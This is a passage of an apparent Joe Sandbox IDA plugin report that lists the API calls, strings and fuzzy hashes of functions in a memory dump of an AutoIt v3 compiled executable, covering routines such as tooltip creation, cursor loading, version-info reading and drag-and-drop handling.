CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F84A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F84ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F84AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00F84AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F84B09
IsWindowVisible.USER32(?), ref: 00F84B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F84B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F84B58
GetWindowRect.USER32(?,?), ref: 00F84B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00F84B96
GetMonitorInfoW.USER32(00000000,?), ref: 00F84BB0
CopyRect.USER32(?,?), ref: 00F84BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00F84C32

Strings

(, xrefs: 00F84BA3
0, xrefs: 00F84975
tooltips_class32, xrefs: 00F84A96

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a0b91ad077e1dd3581871fbcf3cfcf6513754b06dd3f64effe85e6aaacd97e41
Instruction ID: 48786e2b151f23e662ca68733ac82e1c4ae55453bf0a4af76f403c59b35db1d0
Opcode Fuzzy Hash: a0b91ad077e1dd3581871fbcf3cfcf6513754b06dd3f64effe85e6aaacd97e41
Instruction Fuzzy Hash: 5AB18D71608341AFDB04EF64C844BAABBE4FF88314F008A1CF5999B2A1D775EC05EB55

Function 00F6449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F644D2
_wcscpy.LIBCMT ref: 00F64500
_wcscmp.LIBCMT ref: 00F6450B
_wcscat.LIBCMT ref: 00F64521
_wcsstr.LIBCMT ref: 00F6452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F64548
_wcscat.LIBCMT ref: 00F64591
_wcscat.LIBCMT ref: 00F64598
_wcsncpy.LIBCMT ref: 00F645C3

Strings

%u.%u.%u.%u, xrefs: 00F64626
StringFileInfo\, xrefs: 00F6451B
DefaultLangCodepage, xrefs: 00F645AB
04090000, xrefs: 00F6457E
\VarFileInfo\Translation, xrefs: 00F64540

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 7c2f59add773b30135d44f2e1db9fcd6965221177b5c06effc9ce1a57bb3602d
Instruction ID: 0890c35dfefe7d8d5524b7535c8a7e8759efc83dabe30245c16a88d041defd20
Opcode Fuzzy Hash: 7c2f59add773b30135d44f2e1db9fcd6965221177b5c06effc9ce1a57bb3602d
Instruction Fuzzy Hash: 6F41D4729002157FDB14BA74EC47EFF776CDF41720F04046AF905A6182EE79EA01B6A6

Function 00F027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028BC
GetSystemMetrics.USER32(00000007), ref: 00F028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028EF
GetSystemMetrics.USER32(00000008), ref: 00F028F7
GetSystemMetrics.USER32(00000004), ref: 00F0291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F0297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F02990
GetClientRect.USER32(00000000,000000FF), ref: 00F029AE
GetStockObject.GDI32(00000011), ref: 00F029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F029D5

Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
Part of subcall function 00F02344: ScreenToClient.USER32(00FC57B0,?), ref: 00F02374
Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7

SetTimer.USER32(00000000,00000000,00000028,00F01256), ref: 00F029FC

Strings

AutoIt v3 GUI, xrefs: 00F02974

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: a1ab036ad2facd3266d3d47052cb266633c381d2e9f1e58e1682648040748157
Instruction ID: 9b0ab8b1e51816796e6d0edc8973177c1c27eb58ea3a51b4d861d65126043faa
Opcode Fuzzy Hash: a1ab036ad2facd3266d3d47052cb266633c381d2e9f1e58e1682648040748157
Instruction Fuzzy Hash: D7B13E75A0020ADFDB14DF68DD49BAE7BA4FB08724F104129FA15E72D0DB74A854FB60

Function 00F5A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F5A47A
__swprintf.LIBCMT ref: 00F5A51B
_wcscmp.LIBCMT ref: 00F5A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F5A583
_wcscmp.LIBCMT ref: 00F5A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00F5A5F6
GetDlgCtrlID.USER32(?), ref: 00F5A648
GetWindowRect.USER32(?,?), ref: 00F5A67E
GetParent.USER32(?), ref: 00F5A69C
ScreenToClient.USER32(00000000), ref: 00F5A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00F5A71D
_wcscmp.LIBCMT ref: 00F5A731
GetWindowTextW.USER32(?,?,00000400), ref: 00F5A757
_wcscmp.LIBCMT ref: 00F5A76B

Part of subcall function 00F2362C: _iswctype.LIBCMT ref: 00F23634

Strings

%s%u, xrefs: 00F5A515

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 1f6ce8ab2c3219975271523ad9190b86e90076f68af17de3a866730cc9622b1f
Instruction ID: 68f60fc51a0c42ec798f82d32048a775cbf326b2372ad3b031793dcf2d04c2bc
Opcode Fuzzy Hash: 1f6ce8ab2c3219975271523ad9190b86e90076f68af17de3a866730cc9622b1f
Instruction Fuzzy Hash: 69A1D571604706AFD714DF60D884FAAB7E8FF48312F044629FE99C2150E734E969EB92

Function 00F5AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00F5AF18
_wcscmp.LIBCMT ref: 00F5AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00F5AF51
CharUpperBuffW.USER32(?,00000000), ref: 00F5AF6E
_wcscmp.LIBCMT ref: 00F5AF8C
_wcsstr.LIBCMT ref: 00F5AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00F5AFD5
_wcscmp.LIBCMT ref: 00F5AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00F5B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B055
_wcscmp.LIBCMT ref: 00F5B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00F5B08D
GetWindowRect.USER32(00000004,?), ref: 00F5B0F6

Strings

@, xrefs: 00F5AEF9
ThumbnailClass, xrefs: 00F5AFE0, 00F5B060

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: d8534f31a87eed416a3e1dedc064c8dae9fe7af091237a1dab1d7e9f2af55620
Instruction ID: 0604bd9cac8f2d1691b708b30a14037cb9722939ff0bcadb2fe7c16eb31423b5
Opcode Fuzzy Hash: d8534f31a87eed416a3e1dedc064c8dae9fe7af091237a1dab1d7e9f2af55620
Instruction Fuzzy Hash: 2C81B0715083099FDB04DF10C885FAA7BD8EF84325F14856AFE858A092DB34DD4DEBA1

Function 00F5ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F5AC33

Strings

ACTIVE, xrefs: 00F5AC0E
CLASSNAME=, xrefs: 00F5AC70
ALL, xrefs: 00F5ACC7
[HANDLE:, xrefs: 00F5AC3F
[ALL, xrefs: 00F5ACD9
REGEXP=, xrefs: 00F5AC48
HANDLE=, xrefs: 00F5AC2C
LAST, xrefs: 00F5ABF8
[ACTIVE, xrefs: 00F5AC20
[REGEXPTITLE:, xrefs: 00F5AC5B
[LAST, xrefs: 00F5ACE0
[CLASS:, xrefs: 00F5AC83

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 4bdd48a88a9e06d0ee60015bf326b0d979c1ff82e66c99b84012e40fcf0c3d6b
Instruction ID: 4de915eb6bb489914aacb70e2036a869565f1169e2e93fc936805f04e690f6ef
Opcode Fuzzy Hash: 4bdd48a88a9e06d0ee60015bf326b0d979c1ff82e66c99b84012e40fcf0c3d6b
Instruction Fuzzy Hash: 7131C271A48309ABDB00FA61DD07EEE7768AF10721F600558F902710E1EF59EF18BA53

Function 00F74FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00F75013
LoadCursorW.USER32(00000000,00007F00), ref: 00F7501E
LoadCursorW.USER32(00000000,00007F03), ref: 00F75029
LoadCursorW.USER32(00000000,00007F8B), ref: 00F75034
LoadCursorW.USER32(00000000,00007F01), ref: 00F7503F
LoadCursorW.USER32(00000000,00007F81), ref: 00F7504A
LoadCursorW.USER32(00000000,00007F88), ref: 00F75055
LoadCursorW.USER32(00000000,00007F80), ref: 00F75060
LoadCursorW.USER32(00000000,00007F86), ref: 00F7506B
LoadCursorW.USER32(00000000,00007F83), ref: 00F75076
LoadCursorW.USER32(00000000,00007F85), ref: 00F75081
LoadCursorW.USER32(00000000,00007F82), ref: 00F7508C
LoadCursorW.USER32(00000000,00007F84), ref: 00F75097
LoadCursorW.USER32(00000000,00007F04), ref: 00F750A2
LoadCursorW.USER32(00000000,00007F02), ref: 00F750AD
LoadCursorW.USER32(00000000,00007F89), ref: 00F750B8
GetCursorInfo.USER32(?), ref: 00F750C8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 068d06b3470143ba37081bc6f9c53a631e486ced65da485540d1f5d79f57e324
Instruction ID: d8c3b3dcfca958b3a4a6ce838ee94567573a66915bfeaade1f11dd6433a3be71
Opcode Fuzzy Hash: 068d06b3470143ba37081bc6f9c53a631e486ced65da485540d1f5d79f57e324
Instruction Fuzzy Hash: EE31F6B1D4831E6ADF109FB69C8996EBFE8FF04750F50452BA50DE7280DAB8A5009F91

Function 00F8A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8A259
DestroyWindow.USER32(?,?), ref: 00F8A2D3

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F8A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F8A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A382
DestroyWindow.USER32(00000000), ref: 00F8A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F8A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A3F4
GetDesktopWindow.USER32 ref: 00F8A40D
GetWindowRect.USER32(00000000), ref: 00F8A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F8A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F8A444

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

Strings

0, xrefs: 00F8A26F
tooltips_class32, xrefs: 00F8A346, 00F8A3D4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 32636d4b17e3c96d8aa5d473a6fa8d82b54b62b163b2b84e4b8e58693139f111
Instruction ID: 175ba3d99c986e4e76769b43a4a207e8fa6f81273f7760f865ff783511039a8b
Opcode Fuzzy Hash: 32636d4b17e3c96d8aa5d473a6fa8d82b54b62b163b2b84e4b8e58693139f111
Instruction Fuzzy Hash: B771DF70540208AFEB20DF28CC49FAA7BE5FB88710F04452DF985872B0D775E94AEB52

Function 00F8C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DragQueryPoint.SHELL32(?,?), ref: 00F8C627

Part of subcall function 00F8AB37: ClientToScreen.USER32(?,?), ref: 00F8AB60
Part of subcall function 00F8AB37: GetWindowRect.USER32(?,?), ref: 00F8ABD6
Part of subcall function 00F8AB37: PtInRect.USER32(?,?,00F8C014), ref: 00F8ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F8C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F8C6BE
_wcscat.LIBCMT ref: 00F8C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F8C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00F8C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00F8C757
DragFinish.SHELL32(?), ref: 00F8C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F8C851

Strings

@GUI_DRAGID, xrefs: 00F8C7C9
@GUI_DRAGFILE, xrefs: 00F8C800
@GUI_DROPID, xrefs: 00F8C77E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 3c49c86e30f236757b42bab7ad8acac3cc82972ebc7f3aa2ac6257e74e93637f
Instruction ID: a5756730cecac3da1cd6b35e9a73cf308a940960e7c56c82ce0b41a32f3c5a36
Opcode Fuzzy Hash: 3c49c86e30f236757b42bab7ad8acac3cc82972ebc7f3aa2ac6257e74e93637f
Instruction Fuzzy Hash: C8618F71508305AFC701EF64CC85DAFBBE8EF89750F40092EF595922A1DB70E949EB52

Function 00F84392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F84424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F8446F

Strings

SELECT, xrefs: 00F84620
EXISTS, xrefs: 00F844D8
GETTEXT, xrefs: 00F845C2
COLLAPSE, xrefs: 00F844B5
GETTOTALCOUNT, xrefs: 00F84456
CHECK, xrefs: 00F8448F
ISCHECKED, xrefs: 00F845F2
GETITEMCOUNT, xrefs: 00F84551
GETSELECTED, xrefs: 00F8457F
EXPAND, xrefs: 00F84521
UNCHECK, xrefs: 00F8464B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 0d66072caed4dd705b8718583935fa1929cc0bf9ad2ed26dacbbbe7405cc4af4
Instruction ID: 85ee1cbd2e015207e06da368093de37254b322618e1cb4bf8551c01053c76bc9
Opcode Fuzzy Hash: 0d66072caed4dd705b8718583935fa1929cc0bf9ad2ed26dacbbbe7405cc4af4
Instruction Fuzzy Hash: 6C915D716083129FCB04EF10C851AAEB7E1AF95350F44846CE8965B3A3DB78ED09FB81

Function 00F8B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F8B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F891C2), ref: 00F8B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F8B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8B9C3
FreeLibrary.KERNEL32(?), ref: 00F8B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F8B9DF
DestroyIcon.USER32(?,?,?,?,?,00F891C2), ref: 00F8B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F8BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F8BA17

Part of subcall function 00F22EFD: __wcsicmp_l.LIBCMT ref: 00F22F86

Strings

.exe, xrefs: 00F8B84A
.icl, xrefs: 00F8B82A
.dll, xrefs: 00F8B86D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 3070f30a52925c3d256bfd40182216569955a2b75f5ab969ea9ad6cf6c5760ed
Instruction ID: 260ee737c6a48c6b7948af1b623963f97fb7ef124fe758200b0c66fe8e72b7e8
Opcode Fuzzy Hash: 3070f30a52925c3d256bfd40182216569955a2b75f5ab969ea9ad6cf6c5760ed
Instruction Fuzzy Hash: 3761F071900219BEEB14EF64DC45FFE7BA8EB08721F108115FA11D61C1DBB49A84FBA0

Function 00F6A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CharLowerBuffW.USER32(?,?), ref: 00F6A3CB
GetDriveTypeW.KERNEL32 ref: 00F6A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A4C5

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Strings
